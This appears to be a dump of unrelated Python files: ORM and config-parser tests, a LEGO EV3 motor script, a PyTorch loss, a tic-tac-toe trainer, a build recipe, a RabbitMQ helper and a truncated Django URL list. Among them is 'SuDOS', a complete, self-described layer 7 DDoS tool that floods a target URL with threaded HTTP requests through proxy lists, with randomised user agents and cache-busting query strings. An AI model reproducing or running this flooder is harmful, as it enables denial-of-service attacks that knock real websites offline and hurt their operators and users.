def test_pkg_info():
print(aapt.ls("$HOME/Downloads/zzt.apk"))
|
import pytest
def test_save_when_pk_exists(user_model):
sam = user_model(id=1, name="Sam", height=178.6, married=True)
# The primary key value is not empty, the force_insert is False,
# this is the update logic, but there is no data in the cache,
# so the save does not take effect.
assert sam.save(force_insert=False) is False
assert user_model.get_or_none(id=1) is None
# Update logic, there is already data in the cache, so save takes effect.
sam = user_model.create(id=1, name="Sam", height=178.6, married=True)
assert user_model.get_or_none(id=1) == sam
sam.height = 180
assert sam.save() is True
assert 180 == user_model.get_by_id(1).height == sam.height
def test_set_by_id(user_model):
with pytest.raises(user_model.DoesNotExist):
user_model.set_by_id(1, {"height": 180})
user_model.create(id=1, name="Sam", height=178.6, married=True)
sam = user_model.set_by_id(1, {"height": 180})
assert 180 == user_model.get_by_id(1).height == sam.height
def test_update(user_model):
sam = user_model.update(id=1, height=180).execute()
assert sam is None
user_model.create(id=1, name="Sam", height=178.6, married=True)
sam = user_model.update(id=1, height=180).execute()
assert 180 == user_model.get_by_id(1).height == sam.height
with pytest.raises(ValueError):
user_model.update(height=180).execute()
def test_update_many(user_model):
sam, amy = user_model.update_many(
{"id": 1, "height": 180}, {"id": 2, "married": True}
).execute()
assert sam == amy is None
user_model.create(id=2, name="Amy", height=167.5, email="Amy@gmail.com")
sam, amy = user_model.update_many(
{"id": 1, "height": 180}, {"id": 2, "married": True}
).execute()
assert sam is None
assert amy.height == 167.5
assert user_model.get_by_id(2).married is True
|
import click
from cloup import option, option_group
global_options = option_group(
"Global options",
option(
"-c",
"--config_file",
help="Specify the configuration file to use for render settings.",
),
option(
"--custom_folders",
is_flag=True,
help="Use the folders defined in the [custom_folders] section of the "
"config file to define the output folder structure.",
),
option(
"--disable_caching",
is_flag=True,
help="Disable the use of the cache (still generates cache files).",
),
option("--flush_cache", is_flag=True, help="Remove cached partial movie files."),
option("--tex_template", help="Specify a custom TeX template file."),
option(
"-v",
"--verbosity",
type=click.Choice(
["DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"],
case_sensitive=False,
),
help="Verbosity of CLI output. Changes ffmpeg log level unless 5+.",
),
)
|
#!/usr/bin/env python2
# Copyright (c) 2011 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""The unittest of experiment_file."""
from __future__ import print_function
import StringIO
import unittest
from experiment_file import ExperimentFile
EXPERIMENT_FILE_1 = """
board: x86-alex
remote: chromeos-alex3
perf_args: record -a -e cycles
benchmark: PageCycler {
iterations: 3
}
image1 {
chromeos_image: /usr/local/google/cros_image1.bin
}
image2 {
remote: chromeos-lumpy1
chromeos_image: /usr/local/google/cros_image2.bin
}
"""
EXPERIMENT_FILE_2 = """
board: x86-alex
remote: chromeos-alex3
iterations: 3
benchmark: PageCycler {
}
benchmark: AndroidBench {
iterations: 2
}
image1 {
chromeos_image:/usr/local/google/cros_image1.bin
}
image2 {
chromeos_image: /usr/local/google/cros_image2.bin
}
"""
EXPERIMENT_FILE_3 = """
board: x86-alex
remote: chromeos-alex3
iterations: 3
benchmark: PageCycler {
}
image1 {
chromeos_image:/usr/local/google/cros_image1.bin
}
image1 {
chromeos_image: /usr/local/google/cros_image2.bin
}
"""
OUTPUT_FILE = """board: x86-alex
remote: chromeos-alex3
perf_args: record -a -e cycles
benchmark: PageCycler {
\titerations: 3
}
label: image1 {
\tremote: chromeos-alex3
\tchromeos_image: /usr/local/google/cros_image1.bin
}
label: image2 {
\tremote: chromeos-lumpy1
\tchromeos_image: /usr/local/google/cros_image2.bin
}\n\n"""
class ExperimentFileTest(unittest.TestCase):
"""The main class for Experiment File test."""
def testLoadExperimentFile1(self):
input_file = StringIO.StringIO(EXPERIMENT_FILE_1)
experiment_file = ExperimentFile(input_file)
global_settings = experiment_file.GetGlobalSettings()
self.assertEqual(global_settings.GetField('remote'), ['chromeos-alex3'])
self.assertEqual(
global_settings.GetField('perf_args'), 'record -a -e cycles')
benchmark_settings = experiment_file.GetSettings('benchmark')
self.assertEqual(len(benchmark_settings), 1)
self.assertEqual(benchmark_settings[0].name, 'PageCycler')
self.assertEqual(benchmark_settings[0].GetField('iterations'), 3)
label_settings = experiment_file.GetSettings('label')
self.assertEqual(len(label_settings), 2)
self.assertEqual(label_settings[0].name, 'image1')
self.assertEqual(label_settings[0].GetField('chromeos_image'),
'/usr/local/google/cros_image1.bin')
self.assertEqual(label_settings[1].GetField('remote'), ['chromeos-lumpy1'])
self.assertEqual(label_settings[0].GetField('remote'), ['chromeos-alex3'])
def testOverrideSetting(self):
input_file = StringIO.StringIO(EXPERIMENT_FILE_2)
experiment_file = ExperimentFile(input_file)
global_settings = experiment_file.GetGlobalSettings()
self.assertEqual(global_settings.GetField('remote'), ['chromeos-alex3'])
benchmark_settings = experiment_file.GetSettings('benchmark')
self.assertEqual(len(benchmark_settings), 2)
self.assertEqual(benchmark_settings[0].name, 'PageCycler')
self.assertEqual(benchmark_settings[0].GetField('iterations'), 3)
self.assertEqual(benchmark_settings[1].name, 'AndroidBench')
self.assertEqual(benchmark_settings[1].GetField('iterations'), 2)
def testDuplicateLabel(self):
input_file = StringIO.StringIO(EXPERIMENT_FILE_3)
self.assertRaises(Exception, ExperimentFile, input_file)
def testCanonicalize(self):
input_file = StringIO.StringIO(EXPERIMENT_FILE_1)
experiment_file = ExperimentFile(input_file)
res = experiment_file.Canonicalize()
self.assertEqual(res, OUTPUT_FILE)
if __name__ == '__main__':
unittest.main()
|
import time
import sys
commands = {
'OUTPUT_RESET': 'A2',
'OUTPUT_STOP': 'A3',
'OUTPUT_POWER': 'A4', # seems to max out around 0x1F with 0x20 backwards
'OUTPUT_SPEED': 'A5',
'OUTPUT_START': 'A6',
'OUTPUT_POLARITY': 'A7', # 0x01 forwards, 0x00 toggle, 0xFF backwards
}
motors = {
'A': 1,
'B': 2,
'C': 4,
'D': 8
}
def ev3motor(cmd,m,pwr):
motorhx = 0
for i in list(m):
motorhx += motors[i]
motorhx = "%0.2X" % motorhx
cmdhx = commands[cmd]
cmdstr = cmdhx + '00' + motorhx
print(cmdstr)
ev3motor('OUTPUT_START','AB','')
sys.exit()
# command to start motor on port A at speed 20
# 0C 00 00 00 80 00 00 A4 00 01 14 A6 00 01
# 12 0 0 0 128 0 0 164 0 1 20 166 0 1
#
# Length: 0C 00 -> 12
# Counter: 00 00 -> 0
# Reply: 80 -> No reply
# Variables: 00 00 -> None (?)
# Command: A4 -> opOUTPUT_POWER
# 00: Null block
# Motor: 01 -> A
# Value: 14 -> 20
# Command: A6 -> opOUTPUT_START
# 00: Null block
# Motor: 01 -> A
start_motor_str = '0C000000800000A400061FA60006'
start_motor = bytes.fromhex(start_motor_str)
change_motor_power_str = '09000000800000A70006FF'
change_motor_power = bytes.fromhex(change_motor_power_str)
# command to stop motor on port A
# 09 00 01 00 80 00 00 A3 00 01 00
# 9 0 1 0 128 0 0 163 0 1 0
#
# Length: 09 00 -> 9
# Counter: 01 00 -> 1
# Reply: 80 -> No reply
# Variables: 00 00 -> None (?)
# Command: A3 -> opOUTPUT_STOP
# 00: Null block
# Motor: 01 -> A
# Value: 00 -> Float
stop_motor_str = '09000100800000A3000600'
stop_motor = bytes.fromhex(stop_motor_str)
# send commands to EV3 via bluetooth
with open('/dev/tty.EV3-SerialPort', 'wb', 0) as bt:
bt.write(start_motor)
time.sleep(5)
bt.write(change_motor_power)
time.sleep(5)
bt.write(stop_motor)
|
import torch
import torch.nn.functional as F
from ..registry import LOSSES
@LOSSES.register_module()
class LapLoss(torch.nn.Module):
def __init__(self,
max_levels=5,
channels=1,
device=torch.device('cuda'),
loss_weight=1.0):
super(LapLoss, self).__init__()
self.max_levels = max_levels
self.gauss_kernel = LapLoss._gauss_kernel(
channels=channels, device=device)
self.loss_weight = loss_weight
def forward(self, input, target, weight=None):
pyr_input = LapLoss._laplacian_pyramid(
img=input, kernel=self.gauss_kernel, max_levels=self.max_levels)
pyr_target = LapLoss._laplacian_pyramid(
img=target, kernel=self.gauss_kernel, max_levels=self.max_levels)
loss_lap = sum(F.l1_loss(a, b) for a, b in zip(pyr_input, pyr_target))
return loss_lap * self.loss_weight
@staticmethod
def _gauss_kernel(size=5, device=torch.device('cpu'), channels=3):
kernel = torch.tensor([[1., 4., 6., 4., 1], [4., 16., 24., 16., 4.],
[6., 24., 36., 24., 6.],
[4., 16., 24., 16., 4.], [1., 4., 6., 4., 1.]])
kernel /= 256.
kernel = kernel.repeat(channels, 1, 1, 1)
kernel = kernel.to(device)
return kernel
@staticmethod
def _downsample(x):
return x[:, :, ::2, ::2]
@staticmethod
def _upsample(x):
cc = torch.cat([
x,
torch.zeros(
x.shape[0],
x.shape[1],
x.shape[2],
x.shape[3],
device=x.device)
],
dim=3)
cc = cc.view(x.shape[0], x.shape[1], x.shape[2] * 2, x.shape[3])
cc = cc.permute(0, 1, 3, 2)
cc = torch.cat([
cc,
torch.zeros(
x.shape[0],
x.shape[1],
x.shape[3],
x.shape[2] * 2,
device=x.device)
],
dim=3)
cc = cc.view(x.shape[0], x.shape[1], x.shape[3] * 2, x.shape[2] * 2)
x_up = cc.permute(0, 1, 3, 2)
return LapLoss._conv_gauss(
x_up,
4 * LapLoss._gauss_kernel(channels=x.shape[1], device=x.device))
@staticmethod
def _conv_gauss(img, kernel):
img = F.pad(img, (2, 2, 2, 2), mode='reflect')
out = F.conv2d(img, kernel, groups=img.shape[1])
return out
@staticmethod
def _laplacian_pyramid(img, kernel, max_levels=3):
current = img
pyr = []
for level in range(max_levels):
filtered = LapLoss._conv_gauss(current, kernel)
down = LapLoss._downsample(filtered)
up = LapLoss._upsample(down)
diff = current - up
pyr.append(diff)
current = down
return pyr
@staticmethod
def _weight_pyramid(img, max_levels=3):
current = img
pyr = []
for level in range(max_levels):
down = LapLoss._downsample(current)
pyr.append(current)
current = down
return pyr
|
"""Module to train tic-tac-toe program."""
import numpy as np
import pickle
import os
from checkwin import checkwin
from decideplay import decideplay
from evalboard import recall_board, diffuse_utility, nd3_to_tuple, tuple_to_nd3
from transform import board_transform, board_itransform
from updateboard import make_move
from updateutility import update_utility, flip_player
#-----------------------------------------------------------------------
# Beginning of Inputs
# Player 1 (i.e. p1) and Player 2 (i.e. p2) numeric representation.
p1 = 1
p2 = 2
# Should training consider previously received rewards or punishments.
use_prob_p1 = False
use_prob_p2 = False
# Number of simulations to perform during training.
number_simulation = 10000
# Name of training file for p1 and p2
file_name_p1 = "training_p1_"+str(number_simulation)
file_name_p2 = "training_p2_"+str(number_simulation)
# Name of file for learning curve (i.e. LC) may be viewed using vis_training.ipynb.
file_name_lc = "LC_"+str(number_simulation)
# Reward for win and punishment for loss.
reward_win = 2
punish_loss = -1
# End of Inputs
#-----------------------------------------------------------------------
# Load previous training sets
boards_played = {}
fnames = {p1: file_name_p1, p2: file_name_p2}
for player in (p1, p2):
if os.path.isfile(fnames[player]):
with open(fnames[player], "rb") as f:
boards_played[player] = pickle.load(f)
else:
boards_played[player] = {}
# Loop through a number of models
training_summary = []
for simulation in range(number_simulation):
# Initialize new game
state = np.zeros((3, 3))
win = False
draw = False
current_game_boards = {p1: [], p2: []}
current_game_move = {p1: [], p2: []}
# Loop through a single game, at most 5 moves for a single player
for game_move in range(5):
# Switch between players
for current_player in (p1, p2):
# Check if board has been seen before
seen_before, key, trans_number = recall_board(state,
boards_played[current_player],
p1=p1,
p2=p2)
# Logic to decide if previous utility will be used
if current_player == p1:
use_prob = True if use_prob_p1 else False
elif current_player == p2:
use_prob = True if use_prob_p2 else False
else:
raise RuntimeError("Player unknown!")
# If seen before and using past info -> recall
# If seen before and not using prob -> set diffuse
# If not seen before -> diffuse
if seen_before:
if use_prob:
board_state = boards_played[current_player][key]
else:
board_state = diffuse_utility(tuple_to_nd3(key), p1=p1, p2=p2)
else:
board_state = diffuse_utility(state, p1=p1, p2=p2)
boards_played[current_player].update({key: board_state})
# Transformed gameboard key
current_game_boards[current_player] += [key]
# Decide the move
true_move, tran_move = decideplay(board_state, trans_number)
# Save tranformed movement
current_game_move[current_player] += [tran_move]
# Make the move, and update state
state = make_move(state, true_move, current_player)
# Check if there is a winner, after three moves, as none before.
if game_move >= 2:
win = checkwin(state, p1=p1, p2=p2)
if win:
winning_player = current_player
losing_player = p1 if current_player == p2 else p2
break
elif ((game_move == 4) & (current_player == p1)):
draw = True
break
if win | draw:
break
if win | draw:
break
# Update utility
if win:
# Update player 1
boards_played = update_utility(boards_played,
current_game_boards,
current_game_move,
p1,
winning_player,
losing_player,
reward_win,
punish_loss,
flag_indirect=True,
)
# Update player 2
boards_played = update_utility(boards_played,
current_game_boards,
current_game_move,
p2,
winning_player,
losing_player,
reward_win,
punish_loss,
flag_indirect=True,
)
# Save training, win p1=1, win p2=2, tie=0
training_summary += [winning_player] if win else [0]
# Save out boards played during training.
for player in (p1, p2):
with open(fnames[player], "wb") as f:
pickle.dump((boards_played[player]), f)
# Save win, loss, tie training information.
with open(file_name_lc, "wb") as f:
pickle.dump(training_summary, f)
|
from . import sly
|
import os
import shutil
from .base import GnuRecipe
class LaceRecipe(GnuRecipe):
def __init__(self, *args, **kwargs):
super(LaceRecipe, self).__init__(*args, **kwargs)
self.sha256 = '45e546e306c73ceed68329189f8f75fe' \
'cee3a1db8abb02b5838674a98983c5fe'
self.name = 'lace'
self.version = '0d882b10129789cacf901606b972e3159b8ae9b0'
self.depends = ['hwloc']
self.url = self.github_commit('trolando')
self.configure_args = [
'cmake',
'-G',
'"Unix Makefiles"',
'-DCMAKE_BUILD_TYPE=Release',
'-DCMAKE_INSTALL_PREFIX=%s' % self.prefix_dir,
'..']
def configure(self):
dir = os.path.join(self.directory, 'build')
os.makedirs(dir)
old = self.directory
self.directory = dir
super(LaceRecipe, self).configure()
def install(self):
super(LaceRecipe, self).install()
text = r'''
Lace
Lace is a C library that implements work-stealing. Work-stealing is a method for load balancing task-based parallel programs.
Lace is developed (2012-2014) by the Formal Methods and Tools group at the University of Twente. It is licensed with the Apache 2.0 license.
Download
You can clone our Git repository: http://fmt.ewi.utwente.nl/tools/scm/lace.git.
Alternatively, you can download a recent snapshot.
Please let us know if you use Lace in your project.
Testing / Benchmarking
To compile and run the test benchmarks, you need CMake and Python. In a terminal/command line, run the following commands:
cmake .
make
python bench.py
The benchmark script automatically detects the number of CPUs on your system and runs the benchmarks fib, uts, matmul and queens.
Usage
To use Lace in your own projects, you need to generate the header file lace.h. Use the following command to generate this file, replacing N by the highest number of parameters in your tasks:
lace.sh N > lace.h
For example, with N=3, lace.h defines macros TASK_1, TASK_2 and TASK_3 for tasks with 1, 2 or 3 parameters.
Include lace.h when defining tasks. Add lace.c to the source files of your program.
You can separate declaration and implementation using TASK_DECL_* and TASK_IMPL_*. For tasks that don't return a value, use VOID_TASK_*.
For example, to parallelize void search(int a, int b):
// search.h
#include <lace.h>
VOID_TASK_DECL_2(search, int, int);
#define search(a, b) CALL(search, (a), (b))
// search.c
#include <search.h>
VOID_TASK_IMPL_2(search, int, a, int, b)
{
// Implementation here...
}
// some_file.c
#include <search.h>
void some_function()
{
// ...
search(a, b); // execute search in parallel
// alternatively use: CALL(search, a, b);
// ...
}
If you run your program on a NUMA system, set preprocessor define USE_NUMA=1 and add numa_tools.c to the source files of your program.
When using Lace, you need to tell it how many workers there are with a call to lace_init. This function takes two parameters: the number of workers and the (static) size of the task queue of each worker. This initializes Lace, but does not start the worker threads. For the size of the task queue you can use some high number, e.g. 1,000,000. The memory is virtually allocated using mmap but not actually allocated by the kernel until it is used, so a large size is no problem in current multi-core systems.
You can then start the worker pthreads using lace_startup. This function takes three parameters: the size of the program stack of the new pthreads, a Lace callback task that is the starting point of the parallel program, and a parameter for that task. If the first parameter is set to 0, then the default behavior is to allocate a program stack of the same size as the calling thread. If the second and third parameter are set, then the calling thread is suspended until the supplied Lace task is completed and the Lace framework is automatically shut down. If the second and third parameter are set to NULL, then Lace returns control to the calling thread, which is initialized as a Lace worker thread. The function lace_exit must be called manually to shutdown Lace afterwards.
For example:
// fib.h
#include <lace.h>
TASK_DECL_1(int, fib, int);
#define fib(n) CALL(fib, (n))
// fib.c
#include <fib.h>
TASK_IMPL_1(int, fib, int, n)
{
if (n<2) return n;
SPAWN(fib, n-1);
SPAWN(fib, n-2);
int fib_minus_2 = SYNC(fib);
// Alternatively, instead of SPAWN/SYNC, use:
// int fib_minus_2 = CALL(fib, n-2);
int fib_minus_1 = SYNC(fib);
return fib_minus_1 + fib_minus_2;
}
// main.c
#include <fib.h>
LACE_CALLBACK(startup)
{
int n = (int)arg;
printf("fib(%d) = %d\n", n, fib(n));
}
int main(int argc, char** argv) {
int n = 40;
// Initialize for 4 workers and some large enough deque size
lace_init(4, 1000000);
// Launch 3 workers plus 1 worker starting in 'startup' and suspend caller...
lace_startup(0, startup, (void*)n);
// Alternative: launch 3 workers, and return to caller...
lace_startup(0, NULL, NULL);
printf("fib(%d) = %d\n", n, fib(n));
lace_exit();
return 0;
}
It is also possible to manually start worker threads and use lace_init_worker to initialize each worker, then use lace_steal_loop to participate in work-stealing until Lace is shutdown. Note that there is a barrier in Lace initialization code that waits until all workers are initialized, and a barrier in the shutdown code that waits until all workers return.
'''
doc_dir = os.path.join(self.prefix_dir, 'share', 'doc', 'lace')
if os.path.exists(doc_dir):
shutil.rmtree(doc_dir)
os.makedirs(doc_dir)
doc_file = os.path.join(doc_dir, 'README')
self.log_dir('install', doc_dir, 'README documentation')
with open(doc_file, 'wt') as f:
f.write(text)
|
# -*- coding: utf-8 -*-
"""
Created on 21 August 2017
@author: dgrossman
"""
import logging
import threading
import time
from functools import partial
import pika
class Rabbit(object):
'''
Base Class for RabbitMQ
'''
def __init__(self):
self.logger = logging.getLogger('rabbit')
def make_rabbit_connection(self, host, port, exchange, queue_name, keys,
total_sleep=float('inf')): # pragma: no cover
'''
Connects to rabbitmq using the given hostname,
exchange, and queue. Retries on failure until success.
Binds routing keys appropriate for module, and returns
the channel and connection.
'''
wait = True
do_rabbit = True
rabbit_channel = None
rabbit_connection = None
while wait and total_sleep > 0:
try:
# Starting rabbit connection
rabbit_connection = pika.BlockingConnection(
pika.ConnectionParameters(host=host, port=port)
)
rabbit_channel = rabbit_connection.channel()
rabbit_channel.exchange_declare(exchange=exchange,
exchange_type='topic')
rabbit_channel.queue_declare(queue=queue_name, exclusive=False)
self.logger.debug(
'connected to {0} rabbitmq...'.format(host))
wait = False
except Exception as e:
self.logger.debug(
'waiting for connection to {0} rabbitmq...'.format(host))
self.logger.debug(str(e))
time.sleep(2)
total_sleep -= 2
wait = True
if wait:
do_rabbit = False
if isinstance(keys, list) and not wait:
for key in keys:
self.logger.debug(
'array adding key:{0} to rabbitmq channel'.format(key))
rabbit_channel.queue_bind(exchange=exchange,
queue=queue_name,
routing_key=key)
if isinstance(keys, str) and not wait:
self.logger.debug(
'string adding key:{0} to rabbitmq channel'.format(keys))
rabbit_channel.queue_bind(exchange=exchange,
queue=queue_name,
routing_key=keys)
return rabbit_channel, rabbit_connection, do_rabbit
def start_channel(self, channel, mycallback, queue, m_queue):
''' handle threading for messagetype '''
self.logger.debug(
'about to start channel {0}'.format(channel))
channel.basic_consume(queue, partial(mycallback, q=m_queue))
mq_recv_thread = threading.Thread(target=channel.start_consuming)
mq_recv_thread.start()
return mq_recv_thread
|
#!/usr/bin/env python
#version: 2.5 beta
import threading
import argparse
import random
import atexit
import socket
import socks
import time
import ssl
import sys
import os
start_time = 0
active_connections = 0
connection_limit = 0
active_threads = 0
max_threads = 100
delay = 1
ups = 0
total_ups = 0
dps = 0
total_dps = 0
hrs = 0
total_hrs = 0
total_connected = 0
RED = "\u001b[31;1m"
GREEN = "\u001b[32;1m"
YELLOW = "\u001b[33;1m"
BLUE = "\u001b[34;1m"
RESET = "\u001b[0;0m"
user_agents = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:27.0) Gecko/20100101 Firefox/27.0",
"AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:5.0.1) ",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.7.0; U; Edition MacAppStore; en) ",
"Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/534.34 (KHTML,like Gecko) PhantomJS/1.9.0 (development) Safari/534.34",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2)"
]
def sudos(url, **kwargs):
try:
global active_threads
global active_connections
global hrs
global total_hrs
global total_connected
global dps
global total_dps
global ups
global total_ups
active_threads += 1
connected = False
proxy_type = kwargs.get("proxy_type")
proxy_host = kwargs.get("proxy_host")
proxy_port = kwargs.get("proxy_port")
url_dict = url_split(url)
if not url_dict:
print(f"sudos error: invalid url")
return
protocol = url_dict["protocol"]
host = url_dict["domain"]
port = url_dict["port"]
path = url_dict["path"]
parameters = url_dict["parameters"]
if proxy_host:
if not proxy_type:
print(f"sudos error: missing proxy type")
return
elif not proxy_port:
print(f"sudos error: missing proxy port")
return
try:
proxy_port = int(proxy_port)
except ValueError:
print(f"sudos error: unable to convert proxy port to integer")
return
if proxy_host:
sock = socks.socksocket()
sock.set_proxy(proxy_type, proxy_host, proxy_port)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
connected = True
active_connections += 1
total_connected += 1
if protocol == "https":
context = ssl.create_default_context()
sock = context.wrap_socket(sock, server_hostname=host)
if parameters:
parameters = f"&{parameters}"
else:
parameters = ""
while True:
if active_connections < connection_limit:
continue
anti_cache = rand_chars(77)
user_agent = random.choice(user_agents)
http = f"GET {path}?{anti_cache}{parameters} HTTP/1.1\r\nHost: {host}\r\nUser-Agent: {user_agent}\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.5\r\nCache-Control: max-age=0\r\nConnection: keep-alive\r\nDNT: 1\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"
up = sock.send(http.encode())
ups += up
total_ups += up
hrs += 1
total_hrs += 1
while True:
receive = sock.recv(1024)
download = len(receive)
dps += download
total_dps += download
if download < 1024:
break
time.sleep(delay)
except Exception as e:
#print(f"sudos error: {e}")
pass
finally:
active_threads -= 1
if connected:
active_connections -= 1
def clear_console():
if sys.platform == "linux":
os.system("clear")
elif sys.platform == "win32":
os.system("cls")
def rand_chars(length):
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
chars_list = list(chars)
rand_text = random.choices(chars_list, k=length)
text = "".join(rand_text)
return text
def separate(separator_length, string):
separator = " " * separator_length
string = str(string)
return separator[len(string):]
def verbose():
try:
global hrs
global dps
global ups
while True:
print(f"Threads: {GREEN}{active_threads}{RESET} {separate(5, active_threads)} Connections: {GREEN}{active_connections}{RESET} {separate(5, active_connections)} HR/s: {GREEN}{hrs}{RESET} {separate(5, hrs)} D/s: {GREEN}{dps}{RESET} {separate(12, dps)} U/s {GREEN}{ups}{RESET}")
hrs = 0
dps = 0
ups = 0
time.sleep(1)
except Exception:
pass
def url_split(url):
try:
try:
protocol, url = url.split("://", 1)
except ValueError:
return
try:
domain, path = url.split("/", 1)
except ValueError:
domain = url
path = ""
try:
domain, port = domain.split(":", 1)
except ValueError:
if protocol == "https":
port = 443
else:
port = 80
port = int(port)
try:
path, parameters = path.split("?", 1)
except ValueError:
parameters = None
path = f"/{path}"
url_dict = {}
url_dict["protocol"] = protocol
url_dict["domain"] = domain
url_dict["port"] = port
url_dict["path"] = path
url_dict["parameters"] = parameters
return url_dict
except Exception:
return
def bytecount(bytesize):
total = f"{bytesize} B"
if bytesize >= 1000:
total = bytesize / 1000
total = f"{total:.2f} kB"
if bytesize >= 1000000:
total = bytesize / 1000000
total = f"{total:.2f} MB"
if bytesize >= 1000000000:
total = bytesize / 1000000000
total = f"{total:.2f} GB"
if bytesize >= 1000000000000:
total = bytesize / 1000000000000
total = f"{total:.2f} TB"
return total
def onexit():
attack_duration = time.time() - start_time
attack_duration = f"{attack_duration:.2f}"
total_download = bytecount(total_dps)
total_upload = bytecount(total_ups)
print(f"\r\nTotal Requests: {total_hrs}\r\nTotal Connected: {total_connected}\r\nTotal Download: {total_download}\r\nTotal Upload: {total_upload}\r\n\r\nAttack Duration: {attack_duration} seconds")
def main():
try:
global max_threads
global delay
global connection_limit
global start_time
parser = argparse.ArgumentParser(description="SuDOS, powerful layer 7 proxy-based DDoS tool.")
parser.add_argument("-t", "--threads", type=int, default=100, metavar="INT", help="Max thread count")
parser.add_argument("-z", "--proxy-type", choices=["http", "socks4", "socks5"], metavar="PROXYTYPE", help="Proxy list type")
parser.add_argument("-x", "--proxy-list", metavar="PROXYFILE", help="Proxy list file")
parser.add_argument("-c", "--timeout", type=int, default=5, metavar="TIMEOUT", help="Socket connection timeout")
parser.add_argument("-v", "--delay", type=int, default=1, metavar="DELAY", help="Timeout per HTTP request")
parser.add_argument("-b", "--connection-limit", type=int, metavar="INT", help="Connected socket count before flooding the target server")
parser.add_argument("url", nargs="?", metavar="URL", help="Target URL including protocol, domain and port for particular use")
args = parser.parse_args()
max_threads = args.threads
proxy_type = args.proxy_type
proxy_list = args.proxy_list
timeout = args.timeout
url = args.url
if not url:
print(f"ERROR: URL is required")
parser.print_usage()
sys.exit()
socket.setdefaulttimeout(timeout)
delay = args.delay
if args.connection_limit:
connection_limit = args.connection_limit
if not url_split(url):
print(f"ERROR: Invalid URL")
sys.exit()
if proxy_list:
if not proxy_type:
print(f"ERROR: Proxy type is missing")
sys.exit()
try:
proxy_list = open(proxy_list, "r")
proxies = proxy_list.readlines()
proxy_list.close()
except FileNotFoundError:
print(f"ERROR: Proxy list file not found")
sys.exit()
except Exception:
print(f"ERROR: Invalid proxy list file")
sys.exit()
proxy_type = proxy_type.upper()
proxy_type = getattr(socks, proxy_type)
atexit.register(onexit)
threading.Thread(target=verbose, daemon=True).start()
start_time = time.time()
clear_console()
if proxy_list:
while True:
for proxy in proxies:
proxy = proxy.strip()
try:
proxy_host, proxy_port = proxy.split(":")
except Exception:
continue
try:
proxy_port = int(proxy_port)
except Exception:
continue
while True:
if active_threads >= max_threads:
continue
threading.Thread(target=sudos, args=[url], kwargs={"proxy_type": proxy_type, "proxy_host": proxy_host, "proxy_port": proxy_port}, daemon=True).start()
break
else:
while True:
if active_threads >= max_threads:
continue
threading.Thread(target=sudos, args=[url], daemon=True).start()
except KeyboardInterrupt:
sys.exit()
except Exception:
pass
if __name__ == "__main__":
main()
|
from django.conf.urls import patterns, url
from webui.views.dashboard import DashboardView
from webui.views.login import LoginView
from webui.views.logs import LogsView
urlpatterns = patterns(
'webui.views',
url(r'^$', DashboardView.as_view(), name='dashboard'),
url(r'^signin/$', LoginView.as_view(), name='signin'),
url(r'^signout/$', 'signout', name='signout'),
url(r'^sessions/$', 'session.session_list', name='session_list'),
url(r'^sessions/(?P<session_id>[\w-]+)$', 'session.session_details', name='session_details'),
url(r'^sessions/update/$', 'session.session_update', name='session_update'),
url(r'^sessions/new/$', 'session.session_new', name='session_new'),
url(r'^sessions/create/$', 'session.session_create', name='session_create'),
url(r'^sessions/(?P<session_id>[\w-]+)/execute$', 'session.session_execute', name='session_execute'),
url(r'^sessions/(?P<session_id>[\w-]+)/start', 'session.session_start', name='session_start'),
url(r'^sessions/(?P<session_id>[\w-]+)/stop', 'session.session_stop', name='session_stop'),
url(r'^sessions/(?P<session_id>[\w-]+)/executions/(?P<execution_id>[\w-]+)$', 'execution_details', name='execution_details'),
url(r'^testplans/$', 'testplan.testplan_list', name='testplan_list'),
url(r'^testplans/(?P<testplan_id>[\w-]+)$', 'testplan.testplan_details', name='testplan_details'),
url(r'^testplans/update/$', 'testplan.testplan_update', name='testplan_update'),
url(r'^testplans/new/$', 'testplan.testplan_new', name='testplan_new'),
url(r'^testplans/delete/$', 'testplan.testplan_delete', name='testplan_delete'),
url(r'^testplans/(?P<testplan_id>[\w-]+)/rules/(?P<rule_id>[\w-]+)$', 'rule.rule_details', name='rule_details'),
url(r'^testplans/(?P<testplan_id>[\w-]+)/rules/(?P<rule_id>[\w-]+)/update$', 'rule.rule_update', name='rule_update'),
url(r'^testplans/(?P<testplan_id>[\w-]+)/rules/new/$', 'rule.rule_new', name='rule_new'),
url(r'^qos/$', 'qos.qos_list', name='qos_list'),
url(r'^qos/(?P<qos_id>[\w-]+)$', 'qos.qos_details', name='qos_details'),
url(r'^qos/update/$', 'qos.qos_update', name='qos_update'),
url(r'^qos/new/$', 'qos.qos_new', name='qos_new'),
url(r'^qos/delete/$', 'qos.qos_delete', name='qos_delete'),
url(r'^serveroverload/$', 'serveroverload.serveroverload_list', name='serveroverload_list'),
url(r'^serveroverload/(?P<serveroverload_id>[\w-]+)$', 'serveroverload.serveroverload_details', name='serveroverload_details'),
url(r'^serveroverload/update/$', 'serveroverload.serveroverload_update', name='serveroverload_update'),
url(r'^serveroverload/new/$', 'serveroverload.serveroverload_new', name='serveroverload_new'),
url(r'^serveroverload/delete/$', 'serveroverload.serveroverload_delete', name='serveroverload_delete'),
url(r'^recordings/$', 'recording.recording_list', name='recording_list'),
